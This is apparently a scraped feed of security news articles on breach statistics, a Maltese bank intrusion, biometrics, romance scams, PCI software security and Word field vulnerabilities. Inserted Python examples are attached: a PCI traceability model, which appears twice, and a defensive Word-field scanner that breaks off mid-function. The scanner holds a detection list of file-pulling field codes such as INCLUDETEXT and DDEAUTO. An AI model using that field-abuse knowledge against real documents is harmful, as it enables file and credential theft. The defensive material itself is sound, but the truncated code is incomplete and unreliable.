STE WILLIAMS

2018 Was Second-Most Active Year for Data Breaches

Hacking by external actors caused most breaches, but Web intrusions and exposures compromised more records, according to Risk Based Security.

More than 6,500 data breaches were reported in 2018, a new report from Risk Based Security shows.

The breaches, both big and small, were reported through Dec. 31, 2018 — marking a 3.2% decline from the 6,728 breaches reported in 2017 and making it the second-most active year for data breaches on record. Some 5 billion records were exposed, or about 36% less than the nearly 8 billion records exposed in breaches in 2017. In addition, more records were compromised last year than in any previous year other than 2017 and 2005.

As has been the case previously, a handful of mega breaches accounted for a vast proportion of the compromised records. In 2018, the 10 largest breaches accounted for approximately 3.6 billion exposed records — or a startling 70% of the total. In all, 12 breaches in 2018 exposed at least 100 million records. Organizations that disclosed the largest breaches last year included Facebook, Under Armour, Starwood Hotels, and Quora.

For a vast majority of breaches, however, the number of exposed records was 10,000 or less — as has been the case since at least 2012.

The medical and education sectors, often denigrated for having poor security, ironically enough exposed far fewer records than other supposedly more secure sectors. Risk Based Security’s analysis shows that financial services companies, technology firms, retailers, restaurants, hotels, and other businesses were responsible for nearly 66% of the reported breaches and a near identical proportion of the records that were exposed last year. In contrast, the medical and education sectors combined exposed less than 10 million records.

More than six in 10 of the breaches exposed email addresses, and about 57% involved passwords. The proportion of breaches that exposed Social Security numbers and credit card numbers — the two most valuable pieces of data for criminals — was somewhat smaller in contrast, at 13.9% and 12.3%, respectively.

Risk Based Security’s report shows that hacking by malicious external actors remained the cause for most data breaches (57.1%), but Web breaches, such as those resulting from intrusions and data publicly accessible via search engines, exposed more records (39.3%). Insider breaches — of the accidental, negligent, and malicious variety — accounted for about 14% of all breaches last year.

The Breach Disclosure Struggle
One surprise in the data was the scant progress that organizations appear to be making in closing the gap between breach discovery and breach disclosure, says Inga Goddijn, executive vice president at Risk Based Security.

The data shows that government and private institutions took an average of 49.6 days last year to publicly report a breach after its initial discovery. That was actually marginally longer than the 48.6 days it took in 2017, suggesting that organizations are struggling to speed up incident response despite the increased pressure on them to do so in recent years.

“What we found was, after three years of closing the gap between discovery and reporting, the average number of days between those two dates was stagnant in 2018,” Goddijn says.

The general anticipation was that mandates such as the European Union’s General Data Protection Regulation would put pressure on enterprise organizations to improve breach disclosure times. So it was surprising to see little movement on that front last year. “It’s hard to say why it is still taking nearly 50 days to disclose a breach,” Goddijn notes. “It could be we have reached a plateau, where it simply takes two to three weeks to conduct a full investigation and another two to three weeks to work through preparing and releasing a notification.”

The GDPR also draws a clear distinction between disclosing a breach to authorities and notifying victims about it, Goddijn says. The mandate requires breached entities to inform data regulators in their jurisdictions about the incident within 72 hours. But it offers some discretion around when and even whether an organization needs to notify those impacted by a breach. “So even if an event is swiftly reported to privacy regulators, it is possible the event will be publicly disclosed weeks later, if at all,” Goddijn says.

Risk Based Security’s report does not include “dwell time,” or the duration between when an attacker first breaks into a network and when the intrusion is first discovered. But it does show that nearly 70% of organizations that disclosed a data breach in 2018 learned of it from an external source. In fact, only 680 of the more than 6,500 disclosed breaches last year were internally discovered.

“If we look at the rate of internal discovery versus external discovery, we can see that many organizations are still learning of the incident from external sources, such as law enforcement, fraud detection, independent researchers, or even their own customers,” Goddijn notes. “Our assumption is that organizations that are better able to detect a breach will also be better positioned to respond. That’s something we’ll be taking a closer look at in 2019.”


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: https://www.darkreading.com/threat-intelligence/2018-was-second-most-active-year-for-data-breaches/d/d-id/1333875?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Hackers KO Malta’s Bank of Valletta in attempt to nick €13m

Malta’s Bank of Valletta (BOV) has pulled the plug on its entire internet access, including shutting down cashpoints and branch offices, after detecting a “cyber intrusion” by crims that tried to steal nearly €13m.

The Times of Malta reported: “All of the bank’s functions – branches, ATMs, mobile banking and even email services – were suspended and its website taken offline.”

In a statement reported by various local outlets, Maltese prime minister Joseph Muscat told parliament that the attack was detected shortly after the start of business today – and involved assailants, said to be from “overseas”, trying to transfer €13m to a variety of banks spread across the UK, US, Czech Republic and Hong Kong.

The bank’s website, BOV.com, is inaccessible at the time of writing. Even the domain’s nameservers appear to have been wiped, judging from the results of multiple domain lookups attempted by The Register.

“Bank of Valletta apologises to its clients for any inconvenience caused and will be keeping its customers and the general public informed of developments,” the bank said in a statement reported by the Times of Malta. It added that customers’ funds “are in no way impacted or compromised” by the breach.

Local reports indicated that the bank’s unprecedented shutdown had halted all payment processing, including payments made through shops’ point-of-sale terminals where the backend infrastructure relies on BOV systems. An unnamed clothing retailer reportedly suggested problems started around 1.15pm local time (12.15 GMT) today.

Attacks against banks are not as uncommon as one might hope. Infamously, hackers acquired $60m from the Far Eastern International Bank in 2017 after compromising its internal network, while more recently North Korean cyberbaddies were blamed for siphoning $13.5m out of Cosmos Bank by targeting the Indian bank’s ATM testing infrastructure to find a way in.

Two days ago the Bank of Valletta celebrated Safer Internet Day, according to a press release. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/13/bank_of_valletta_13m_euro_hackers_shutdown/

70% of Consumers Want Biometrics in the Workplace

Speed, simplicity, and security underscore their desire, a new study shows.

Many consumers have been using some form of biometrics on their smartphones in their personal lives for several years. Now a new survey indicates that 70% of them want to use biometrics at work, too.

The “Biometric Consumer Sentiment Survey,” released by Veridium today, is based on responses from 1,000 US adults who have experience using biometrics to log into accounts. Respondents cited speed (35%), not having to remember passwords (33%), and security (31%) as the main reasons for looking favorably on biometric authentication.

“What’s clear is that passwords have not evolved,” says James Stickland, CEO of Veridium. “They have only grown more complex and confusing, so we’re finding that consumers want to move the experience they’ve had with biometrics to the workplace.”

George Avetisov, CEO of HYPR, says biometrics in the workplace will start at the executive level, with smartphones for top execs, and work its way down to the rank-and-file staff.

“We’ve seen this with deployments at financial institutions,” Avetisov says. “On the consumer side, we’re seeing large financial companies looking to use biometrics in the payments arena for their customers.” 

Acceptance Takes Time
Though companies began introducing biometrics into the authentication process decades ago, consumers first started using it on a wider scale when biometrics were installed on smartphones, Stickland says. The Motorola Atrix 4G was the first phone to include a fingerprint sensor, made available to consumers in 2011.

Today, consumers routinely use a mix of fingerprint and facial recognition technology on their iPhones (68%), Android phones (25%), laptops (12%), tablets (11%), and smart speakers (5%), the Veridium survey found.

Respondents also indicated their most preferred form of biometric identification on their phones is the fingerprint, at 63%. It ranked way ahead of other forms of identification, such as facial recognition (14%), traditional passwords and PINs (8%), and voice recognition (2%).

Broken down by generation, Millennials most value speed (46%), Generation X most value not having to remember passwords (44%), and Baby Boomers most value security (30%).

“We’ve also found that there’s an ever-growing crowd of people who support eliminating the password,” Stickland says.


Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md.

Article source: https://www.darkreading.com/endpoint/authentication/70--of-consumers-want-biometrics-in-the-workplace/d/d-id/1333867?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Scammers Fall in Love with Valentine’s Day

Online dating profiles and social media accounts add to the rich data sources that allow criminals to tailor attacks.

US-CERT and Cupid don’t often keep company, but this Valentine’s Day is being marked by new threats to those seeking romance and new warnings from the federal cybersecurity group.

A notice from US-CERT points to an FTC blog post about how consumers can protect themselves from online scams involving dating sites, personal messaging systems, and the promise of romance and companionship from online strangers.

The general warning comes as specific scams are being exposed by online researchers. For example, researchers at Agari Data have followed a Nigeria-based group dubbed “Scarlet Widow” since 2017 as they exploited vulnerable populations, moving from romantic “attacks” against isolated farmers and individuals with disabilities to business email compromises that raised the financial stakes.

Security experts aren’t optimistic about finding a quick solution.

“These types of scams will not be disappearing anytime soon,” says Anupam Sahai, vice president of product management at Cavirin. “Certain times of the year, Valentine’s Day included, bring out both the best and the worst in us. Here, hackers prey on those most vulnerable, especially those who are possibly recovering from a family tragedy without a support network. Given the emotions, it is no surprise that romance scam losses, averaging $2,600 each, are seven times greater than most other frauds.”

The primary issue is that these attacks aren’t assaults on technology vulnerabilities — they prey on human limitations.

“These kinds of romance scams are very targeted social engineering attacks, effectively ‘hacking’ the victim’s emotions rather than trying to perform a technical assault,” says Nathan Wenzler, senior director of cybersecurity at Moss Adams. “Unfortunately, these kinds of attacks are becoming more and more commonplace, not only because of the large financial incentive, but because it has become easier than ever to tailor these scams for each individual victim.”

Online dating profiles and social media accounts add to the rich data sources that allow criminals to tailor attacks as they look to exploit individuals in the same way that spear-phishing attacks exploit corporate employees to extract credentials and critical business data.

The FTC provides tips for avoiding victimization that include never sending money to an online romantic contact, taking the relationship slowly, doing an online image search to see whether the photo for the person’s account appears with a different name, and discussing the relationship with friends and family members from real life. US-CERT has its own set of tips for staying safe on social media.

“No matter how desirable a person may sound online, everyone must tread with caution,” says Chris Morales, head of security analytics at Vectra. “Only trust those you know in person, and even then be cautious. In our connected society, everyone needs to remember a basic rule we were taught as a child, especially with people you can’t even look in the eye: Don’t talk to strangers.”


Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/endpoint/scammers-fall-in-love-with-valentines-day/d/d-id/1333869?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

5 Expert Tips for Complying with the New PCI Software Security Framework

The Secure SLC Standard improves business efficiency for payment application vendors but could also stand as a new security benchmark for other industries to follow.

When the PCI Software Security Council (PCI SSC) released the new PCI Software Security Framework in January 2019, it took a progressive leap forward, drastically raising security standards for the payments industry. The framework was created in an effort to align with newly emerging and rapidly advancing technologies in the payments ecosystem.

The new standards require that payments application vendors implement enhanced security controls to adhere to a strictly defined security process. At a high level, the process requires that applications be designed, developed, and maintained to protect the integrity of all payment transactions as well as sensitive data collected in association with those transactions.

In the framework, there are two standards. The PCI Secure Software Standard defines security requirements and assessment procedures for payment applications. The PCI Secure Software Lifecycle (Secure SLC) Standard covers the secure development of applications throughout the whole development cycle. While the former is mandatory and the latter is optional, organizations that can demonstrate compliance with the Secure SLC Standard can forgo the required assessment for every release. This kind of process acceleration is crucial for organizations that employ agile and/or DevOps development processes. 

The Secure SLC Standard not only improves business efficiency for payment application vendors but also has the potential to stand as a new security benchmark for other industries to follow.

5 Compliance Tips
Software developers are adopting more competitive software life-cycle management techniques with faster release cycles, and the PCI Standards were designed to better support these agile environments. To help comply with the PCI Software Security Standards, consider the following:

1. Devise a systematic process for building security in early and maintaining this throughout the SLC.
“The traditional software development lifecycle [addresses] security concerns in the testing phase, which results in very expensive fixes or, worse, security issues that aren’t uncovered until operation. Secure development practices integrate security-related activities in each phase of the SDLC, yielding benefits by making security a continuous concern rather than simply part of test procedures,” as Archer Batcheller et al. put it in a report from 2017. The Secure SLC Standard requires payment applications vendors to use a documented secure software development policy and corresponding strategy. These must establish measurable rules for ensuring that the vendor’s services and products are secure and that its security and compliance obligations are fulfilled.

2. Define and assign security roles and responsibilities in your organization.
In a survey of 29 security leaders, conducted by secureCISO in Phoenix in 2018, it was found that 100% of C-level executives, VPs, and security engineers believe that a lack of security skills and awareness poses the greatest challenge to their development of an application security program. Part of facing this challenge involves clearly defining security roles and assigning responsibilities, along with appropriate training to ensure that each role has the requisite skills to carry out its responsibilities. The new PCI standard requires that you identify specific personnel who are responsible for various components of the Secure SLC and provide them with training on the PCI Software Security Framework. Pay close attention to the roles recommended by the standard and identify any gaps that need to be filled using existing employees, contractors, or new hires.

3. Automate threat identification and definition of security controls. 
The Secure SLC Standard requires that threats be identified before development begins. These threats are then managed throughout the software life cycle through the implementation and testing of security controls. This essentially stipulates that organizations perform threat modeling activities and/or security requirements management (which Gartner refers to as Application Security Requirements and Threat Management, or ASRTM). Generally, this involves maintaining a database of known threats and continuously identifying which of those apply to your application based on its architecture and specific technological makeup.

4. Create a process for continuously identifying and fixing security defects.
This should include regular and continuous testing, which most organizations accomplish with one or more of static analysis, dynamic analysis, or interactive analysis security testing tools, alongside periodic, manual penetration testing. Test results should map back directly to specific security controls you’ve defined to create traceability and ensure controls were correctly implemented.

5. Communicate with clients and stakeholders about security.
The Secure SLC Standard requires that vendors provide adequate guidance related to the secure installation, configuration, and use of their applications. Hence, in addition to a secure development process, the deployment process must be secure. Also, all stakeholders must be informed in a timely manner regarding any security-related changes to the software or any new vulnerabilities that are discovered. Vendors should create a mechanism, such as a security email alias for clients and external researchers, to notify them of any discovered vulnerabilities.
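Tips 3 and 4 describe a loop: keep a catalogue of known threats, select the ones that apply to an application's architecture, derive the controls those threats demand, and then map every test result back to a control so that nothing required goes unverified. The Python below is an added example of that traceability model, written for this page; it is not code from the article, from Security Compass, or from the PCI SSC. The threat IDs, control IDs, component tags, application profile, and test results are all constructed for illustration and are not PCI SSC requirement identifiers.

```python
"""Added example: threat selection, control derivation and test-to-control
traceability in the style of an ASRTM workflow (tips 3 and 4 above).
All identifiers below are constructed for illustration (hypothetical), not
PCI SSC requirement numbers or any vendor's real catalogue."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Threat:
    id: str
    description: str
    applies_to: frozenset   # component tags that make this threat relevant
    controls: tuple         # control IDs that mitigate the threat


# Constructed threat catalogue (hypothetical IDs and mappings).
THREAT_CATALOGUE = (
    Threat("T-001", "SQL injection via untrusted input",
           frozenset({"sql-db", "web-api"}), ("C-PARAM-QUERY", "C-INPUT-VALIDATE")),
    Threat("T-002", "Cardholder data exposed in transit",
           frozenset({"web-api", "pos-terminal"}), ("C-TLS-STRONG",)),
    Threat("T-003", "Cardholder data at rest readable by an attacker",
           frozenset({"sql-db", "file-store"}), ("C-ENCRYPT-AT-REST",)),
    Threat("T-004", "Deserialization of untrusted objects",
           frozenset({"java-rpc"}), ("C-SAFE-DESERIALIZE",)),
)


def applicable_threats(profile):
    """Tip 3: pick the catalogue threats whose component tags overlap the app's architecture."""
    return [t for t in THREAT_CATALOGUE if t.applies_to & profile]


def required_controls(profile):
    """Tip 3: the union of controls demanded by the applicable threats (sorted for stable output)."""
    return sorted({c for t in applicable_threats(profile) for c in t.controls})


def traceability_report(profile, test_results):
    """Tip 4: map test evidence back to each required control.

    test_results maps a control ID to a list of (tool, passed) tuples from SAST,
    DAST, IAST or manual pentest runs. A control is 'verified' only when it has
    evidence and every result passed; 'failing' if any result failed; 'untested'
    if no tool produced evidence for it at all.
    """
    verified, failing, untested = [], [], []
    for control in required_controls(profile):
        results = test_results.get(control, [])
        if not results:
            untested.append(control)
        elif all(passed for _tool, passed in results):
            verified.append(control)
        else:
            failing.append(control)
    return {"verified": verified, "failing": failing, "untested": untested}


def release_gate(profile, test_results):
    """A release is acceptable only when every required control is both tested and passing."""
    report = traceability_report(profile, test_results)
    return not report["failing"] and not report["untested"]


# Constructed application profile: a web payment API backed by a SQL database.
APP_PROFILE = {"web-api", "sql-db"}

# Constructed test evidence keyed by control ID: (tool, passed).
TEST_RESULTS = {
    "C-PARAM-QUERY": [("sast", True), ("dast", True)],
    "C-INPUT-VALIDATE": [("sast", True)],
    "C-TLS-STRONG": [("dast", False)],      # weak cipher suite reported by the DAST scan
    # C-ENCRYPT-AT-REST has no evidence yet, so it must surface as 'untested'
}

if __name__ == "__main__":
    for threat in applicable_threats(APP_PROFILE):
        print(threat.id, "-", threat.description)
    print(traceability_report(APP_PROFILE, TEST_RESULTS))
    print("release gate passed:", release_gate(APP_PROFILE, TEST_RESULTS))
```

The point of `traceability_report` is that an "untested" bucket exists at all: a control that no tool happened to exercise is as much a gap as a failing one, and a release gate that only looks at failed findings would wave it through.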

The PCI Framework in the Bigger Picture
As modern payment technologies evolve, the new PCI Software Security Framework will be crucial for ensuring that the integrity of payment transactions and sensitive data is protected. But the framework also may play a significant role in setting a new security standard for other industries that have equal or greater needs for secure software assurance. Historically, the PCI Data Security Standard (DSS) referenced the Open Web Application Security Project (OWASP) Top 10 in September 2006.

After this point, it became widely referenced by dozens of other compliance documents worldwide. PCI has taken a leadership role in setting the precedent for software security baselines, and we believe that other standards and regulations will similarly take note of the heightened security of payment software resulting from the software security framework. Thankfully, we’re at a point where there is an abundance of comprehensive, professional resources to help organizations comply with the new framework. Now, it’s only a matter of whether organizations choose to use them.


Rohit Sethi, COO of Security Compass, is responsible for setting and achieving corporate objectives, company alignment, and driving strategy to execution. He specializes in software security requirements management (SSRM), working with large companies in various industries to …

Article source: https://www.darkreading.com/application-security/5-expert-tips-for-complying-with-the-new-pci-software-security-framework-/a/d-id/1333835?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

5 Expert Tips for Complying with the New PCI Software Security Framework

The Secure SLC Standard improves business efficiency for payment application vendors but could also stand as new security benchmark for other industries to follow.

When the PCI Software Security Council (PCI SSC) released the new PCI Software Security Framework in January 2019, it took a progressive leap forward, drastically raising security standards for the payments industry. The framework was created in an effort to align with newly emerging and rapidly advancing technologies in the payments ecosystem.

The new standards require that payment application vendors implement enhanced security controls and adhere to a strictly defined security process. At a high level, the process requires that applications be designed, developed, and maintained to protect the integrity of all payment transactions as well as the sensitive data collected in association with those transactions.

The framework comprises two standards. The PCI Secure Software Standard defines security requirements and assessment procedures for payment applications themselves. The PCI Secure Software Lifecycle (Secure SLC) Standard covers the vendor's development practices across the whole life cycle. While the former is mandatory and the latter is optional, organizations that demonstrate compliance with the Secure SLC Standard can forgo the otherwise required assessment of every release. This kind of process acceleration is crucial for organizations that use agile and/or DevOps development processes.

The Secure SLC Standard not only improves business efficiency for payment application vendors but also has the potential to stand as a new security benchmark for other industries to follow.

5 Compliance Tips
Software developers are adopting more competitive software life-cycle management techniques with faster release cycles, and the new PCI standards were designed to better support these agile environments. To help comply with the PCI Software Security Standards, consider the following:

1. Devise a systematic process for building security in early and maintaining this throughout the SLC.
“The traditional software development lifecycle [addresses] security concerns in the testing phase, which results in very expensive fixes or, worse, security issues that aren’t uncovered until operation. Secure development practices integrate security-related activities in each phase of the SDLC, yielding benefits by making security a continuous concern rather than simply part of test procedures,” as Archer Batcheller et al. put it in a report from 2017. The Secure SLC Standard requires payment application vendors to maintain a documented secure software development policy and a corresponding strategy. These must establish measurable rules for ensuring that the vendor’s products and services are secure and that its security and compliance obligations are fulfilled.

2. Define and assign security roles and responsibilities in your organization.
In a survey of 29 security leaders conducted by secureCISO in Phoenix in 2018, 100% of the C-level executives, VPs, and security engineers polled said that a lack of security skills and awareness poses the greatest challenge to building an application security program. Part of meeting this challenge is clearly defining security roles and assigning responsibilities, along with training that ensures each role has the skills it needs to carry out its responsibilities. The new PCI standard requires that you identify specific personnel responsible for the various components of the Secure SLC and train them on the PCI Software Security Framework. Pay close attention to the roles the standard recommends and identify any gaps to be filled with existing employees, contractors, or new hires.

3. Automate threat identification and definition of security controls. 
The Secure SLC Standard requires that threats be identified before development begins and then managed throughout the software life cycle through the implementation and testing of security controls. In practice this means performing threat modeling and/or security requirements management (what Gartner calls Application Security Requirements and Threat Management, or ASRTM). Generally, this involves maintaining a database of known threats and continuously determining which of them apply to your application based on its architecture and specific technology stack; each applicable threat then drives one or more security controls that must be implemented and verified.

4. Create a process for continuously identifying and fixing security defects.
This should include regular, continuous testing, which most organizations accomplish with one or more of static (SAST), dynamic (DAST), or interactive (IAST) application security testing tools, alongside periodic manual penetration testing. Each test result should map directly back to a specific security control you have defined, so that there is traceability from threat to control to evidence and you can show that every control was correctly implemented.

5. Communicate with clients and stakeholders about security.
The Secure SLC Standard requires that vendors provide adequate guidance on the secure installation, configuration, and use of their applications: in addition to a secure development process, the deployment must be secure. All stakeholders must also be informed in a timely manner of any security-related changes to the software and of any newly discovered vulnerabilities. Vendors should create a mechanism, such as a security email alias, that clients and external researchers can use to report vulnerabilities and that the vendor uses to notify clients of any that are discovered.
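Tips 3 and 4 describe a mechanism rather than only a policy: a catalogue of known threats matched against the application's architecture, a set of controls derived from the applicable threats, and test evidence traced back to those controls so gaps are visible before an assessor asks. The Python below is an added illustration of how those three pieces fit together; it is not code from the article, from PCI SSC, or from any Gartner ASRTM product. The threat catalogue, component tags, control IDs, and test results are all constructed for the example.

```python
from __future__ import annotations
from dataclasses import dataclass


@dataclass(frozen=True)
class Threat:
    """Catalogue entry: the threat applies if ANY trigger tag appears in the
    application's component inventory, and is mitigated by the listed controls."""
    id: str
    title: str
    triggers: frozenset[str]
    controls: tuple[str, ...]


# Constructed, illustrative catalogue with hypothetical IDs (not a PCI SSC list).
CATALOGUE = (
    Threat("T-01", "SQL injection through untrusted input", frozenset({"sql-db"}), ("C-PARAM-QUERIES",)),
    Threat("T-02", "Cardholder data exposed in transit", frozenset({"http-api", "web-ui"}), ("C-TLS-ONLY", "C-HSTS")),
    Threat("T-03", "Full PAN written to application logs", frozenset({"logging"}), ("C-LOG-MASKING",)),
    Threat("T-04", "Stored PAN readable at rest", frozenset({"pan-storage"}), ("C-PAN-ENCRYPTION", "C-KEY-ROTATION")),
    Threat("T-05", "Cross-site scripting in merchant portal", frozenset({"web-ui"}), ("C-OUTPUT-ENCODING",)),
)


@dataclass(frozen=True)
class TestResult:
    """One piece of evidence from SAST/DAST/IAST or a manual pentest, tagged with the
    control it exercises. The tag is what makes the evidence traceable."""
    tool: str
    control: str
    passed: bool
    detail: str = ""


def applicable_threats(components: set[str]) -> list[Threat]:
    """Threat identification before development: catalogue entries whose
    trigger tags intersect the declared architecture."""
    return [t for t in CATALOGUE if t.triggers & components]


def required_controls(components: set[str]) -> dict[str, list[str]]:
    """Map each required control to the threat IDs that justify it."""
    required: dict[str, list[str]] = {}
    for t in applicable_threats(components):
        for c in t.controls:
            required.setdefault(c, []).append(t.id)
    return required


def traceability(components: set[str], results: list[TestResult]) -> dict[str, list[str]]:
    """Trace evidence back to required controls and report the three kinds of gap:
    controls with no evidence, controls with failing evidence, and evidence for
    controls no identified threat requires (the catalogue or inventory is stale)."""
    required = required_controls(components)
    evidence: dict[str, list[TestResult]] = {}
    for r in results:
        evidence.setdefault(r.control, []).append(r)
    return {
        "required": sorted(required),
        "untested": sorted(c for c in required if c not in evidence),
        "failing": sorted(c for c in required if c in evidence and not all(r.passed for r in evidence[c])),
        "orphan_evidence": sorted(c for c in evidence if c not in required),
    }


def release_gate(report: dict[str, list[str]]) -> bool:
    """A release is clean only when every required control has passing evidence."""
    return not report["untested"] and not report["failing"]


# Constructed inventory for a hypothetical payment API with no browser front end.
APP_COMPONENTS = {"http-api", "sql-db", "logging", "pan-storage"}

# Constructed evidence, as a CI pipeline might collect it from control-tagged jobs.
SAMPLE_RESULTS = [
    TestResult("sast", "C-PARAM-QUERIES", True, "no string-built SQL found"),
    TestResult("dast", "C-TLS-ONLY", True, "port 80 redirects to 443"),
    TestResult("dast", "C-HSTS", False, "Strict-Transport-Security header missing"),
    TestResult("pentest", "C-LOG-MASKING", True, "PAN masked to last four in sampled logs"),
    TestResult("sast", "C-OUTPUT-ENCODING", True, "template auto-escaping enabled"),
]

if __name__ == "__main__":
    report = traceability(APP_COMPONENTS, SAMPLE_RESULTS)
    for key, value in report.items():
        print(f"{key:16} {', '.join(value) or '-'}")
    print("release gate:", "PASS" if release_gate(report) else "FAIL")
```

On the sample data the gate fails for two reasons that a plain pass/fail test report would not separate: the HSTS check failed, and two encryption controls required by T-04 have no evidence at all. The orphan finding (output encoding tested although no identified threat needs it for an API with no web UI) is the signal to revisit the architecture inventory rather than delete the test.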

The PCI Framework in the Bigger Picture
As modern payment technologies evolve, the new PCI Software Security Framework will be crucial for ensuring that the integrity of payment transactions and sensitive data is protected. But the framework may also play a significant role in setting a new security standard for other industries that have an equal or greater need for secure software assurance. There is precedent: in September 2006, the PCI Data Security Standard (DSS) began referencing the Open Web Application Security Project (OWASP) Top 10.

After that point, the OWASP Top 10 became widely referenced by dozens of other compliance documents worldwide. PCI has taken a leadership role in setting software security baselines, and we believe that other standards and regulations will similarly take note of the heightened security of payment software that results from the Software Security Framework. Thankfully, there is now an abundance of comprehensive, professional resources to help organizations comply with the new framework. It is only a matter of whether organizations choose to use them.

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Rohit Sethi, COO of Security Compass, is responsible for setting and achieving corporate objectives, company alignment, and driving strategy to execution. He specializes in software security requirements management (SSRM), working with large companies in various industries to …

Article source: https://www.darkreading.com/application-security/5-expert-tips-for-complying-with-the-new-pci-software-security-framework-/a/d-id/1333835?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Researchers Dig into Microsoft Office Functionality Flaws

An ongoing study investigating security bugs in Microsoft Office has so far led to two security patches.

Microsoft Office, ubiquitous on enterprise and personal computers, is a hot target for cybercriminals and a key focus area for researchers hoping to find bugs before the bad guys do.

Stan Hegt and Pieter Ceelen, both security researchers and red teamers with security firm Outflank B.V., have been exploring a range of attack techniques that abuse Microsoft Office features. Their previous research, shown at DerbyCon 2018, demonstrated how abusing legacy functionality (a macro language that predates VBA, for example) bypasses security controls.

Outflank B.V. is a small, specialized security firm focused on red teaming, Hegt explained in an interview with Dark Reading. During most engagements, they attempt to remotely compromise workstations. Remote entry is among the toughest attacker methods, says Hegt. “It forces us to innovate, but we don’t see that much innovation in this respect, in the wild.”

Early findings prompted them to analyze flaws in the functionality built into the Office suite. And since DerbyCon, the duo has continued to research Office and uncover new security holes.

“To dive into Microsoft Office, there’s so much to go into,” says Hegt. “When we dove in with the purpose of DerbyCon, we noticed there were many points to go left or right with additional research. Every path led to more cool stuff we could present to the world.”

As part of their ongoing research, Hegt and Ceelen found “at least two things that were not according to spec,” which resulted in two vulnerabilities recently patched by Microsoft. One CVE uses the old Word feature of fields, in combination with macro buttons (no VBA required), to steal the contents of files on disk. The other uses fields in combination with templates and headers to build phishing documents without the use of macros.

“There are plenty of new defenses being built into Microsoft Office, but there are so many archaic features,” Hegt continues. “Many times, those archaic features can be exploited to evade or abuse modern defenses.”

Both bugs the team discovered can be exploited to steal information; one steals files, the other goes after credentials. Further, they say, both combine legacy features in ways that likely weren’t foreseen. The researchers note their analysis shows that the kind of Office malware currently seen in the wild is “just the tip of the iceberg” of what’s possible in Office threats.

At Black Hat Asia, coming up March 26-29 in Singapore, Hegt and Ceelen will take the stage to present their talk “Office in Wonderland,” in which they will disclose details on new Word and Excel vulnerabilities, release attack vectors which Microsoft deemed Office features, and demonstrate the security impact of the architectural design of the full Office suite.

Getting Bugged Down

As part of its January Patch Tuesday release, Microsoft issued CVE-2019-0561, a Microsoft Word information disclosure vulnerability discovered as part of Hegt and Ceelen’s research. According to Microsoft, the flaw exists when Word macro buttons are used improperly, and an attacker who successfully exploits it could read arbitrary files from the targeted system.

To exploit CVE-2019-0561, an attacker would have to create a malicious file and convince the user to open it, and would have to know the location of the file whose contents they want to steal. Microsoft’s patch addresses the vulnerability by changing the way some Word functions handle security warnings.

Microsoft’s February Patch Tuesday release yesterday included CVE-2019-0540, which addresses another bug discovered by Hegt and Ceelen: a Microsoft Office security feature bypass that exists when Office does not validate URLs. Attackers can send victims specially crafted files that trick them into entering their credentials, enabling a phishing attack.

“A lot of organizations rely on username and password combinations,” says Ceelen. “As an attacker it’s very much in [your] interest to go collect usernames and passwords.” This bug lets attackers send plain documents without any macros that prompt the target with a pop-up to enter their credentials. “We slowly see bad guys abusing these techniques,” he continues.

The patch addresses the vulnerability by ensuring that Office properly validates URLs. While Ceelen points to attackers’ focus on Word and Excel, given that they have the longest history, he notes that Microsoft has upped its patching game. “We see them making steps in all directions,” Ceelen says.

Both CVE-2019-0561 and CVE-2019-0540 were classified as Important in severity by Microsoft. Neither was publicly known or exploited in the wild prior to the release of their patches.
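Both bugs above are abuses of legacy Word fields: a macro-button field wrapping a field that pulls in file contents, and fields in headers and templates used to build a credential prompt. A defender triaging inbound documents can look for those combinations structurally, without waiting for a signature, because a .docx is a zip of XML parts in which field instructions are plain text. The Python below is an added example, not code from Outflank, Microsoft, or the article, and it makes its own assumptions: the set of "content-pulling" field codes it watches (INCLUDETEXT, INCLUDEPICTURE, DDE/DDEAUTO, LINK, IMPORT) is my choice for the class of field involved, not the researchers' exploit details; it also flags an external attached template in settings.xml.rels as the template-based variant; and it builds a constructed sample .docx in memory so it runs offline.

```python
from __future__ import annotations
import io, re, zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
R = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Field codes that pull content from disk or a URL. This list is the example's own
# assumption about the class of field involved, not the researchers' specifics.
CONTENT_FIELDS = {"INCLUDETEXT", "INCLUDEPICTURE", "DDE", "DDEAUTO", "LINK", "IMPORT"}
PART_RE = re.compile(r"word/(document|header\d*|footer\d*)\.xml")


def keyword(code: str) -> str:
    """The field type is the first token of the instruction text."""
    tokens = code.split()
    return tokens[0].upper() if tokens else ""


def looks_remote(code: str) -> bool:
    """True if the argument points off-host (URL, file: or UNC path). Word doubles
    backslashes inside field codes, so collapse them before looking for \\server."""
    norm = code.replace("\\\\", "\\")
    return re.search(r"(?i)https?://|file:|\\\\[\w.]", norm) is not None


def extract_fields(part_xml: bytes) -> list[tuple[str, str | None]]:
    """Return (instruction, parent field type) for every field in a WordprocessingML part.
    Simple fields carry the instruction in <w:fldSimple w:instr>; complex fields spread it
    over <w:instrText> runs between 'begin'/'end' <w:fldChar> marks and may nest."""
    root = ET.fromstring(part_xml)
    fields = [(fs.get(W + "instr", "").strip(), None) for fs in root.iter(W + "fldSimple")]
    stack: list[list[str]] = []  # one instruction buffer per open complex field
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                code = " ".join(stack.pop()).strip()
                parent = keyword(" ".join(stack[-1])) if stack else None
                fields.append((code, parent))
                if stack:  # keep the nested code visible inside its parent's instruction
                    stack[-1].append("{ " + code + " }")
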